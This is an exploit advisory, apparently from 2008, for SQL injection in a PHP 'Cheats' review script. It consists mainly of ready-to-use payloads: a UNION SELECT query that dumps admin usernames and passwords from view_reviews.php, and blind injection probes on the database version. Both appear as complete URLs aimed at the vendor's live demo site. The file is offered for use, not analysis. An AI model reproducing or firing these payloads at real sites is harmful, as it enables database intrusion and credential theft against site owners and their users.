getaphpsite Cheats suffers from remote SQL injection vulnerabilities in categories.php and view_reviews.php.
083613c916bfbf9c537ef132c14fcdc8ad3c211c5aa1dd11586a17d11b703d5a
[~] getaphpsite Cheats (id) R-Sql & B-Sql inj : ) )
[~]
[~] script: http://www.getaphpsite.com/134.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
Exp 1: ( Remote )
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[SQL] ( Reklam Kokusu AlIyorum : ) z0rlu.blogspot.com )
[SQL]=
0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--
exp 2: ( Blind )
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[BLiND]
[id]+and+substring(@@version,1,1)=5 ( true )
[id]+and+substring(@@version,1,1)=4 ( false )
for demo: ( Remote )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--
for demo: ( Blind )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 ( true )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------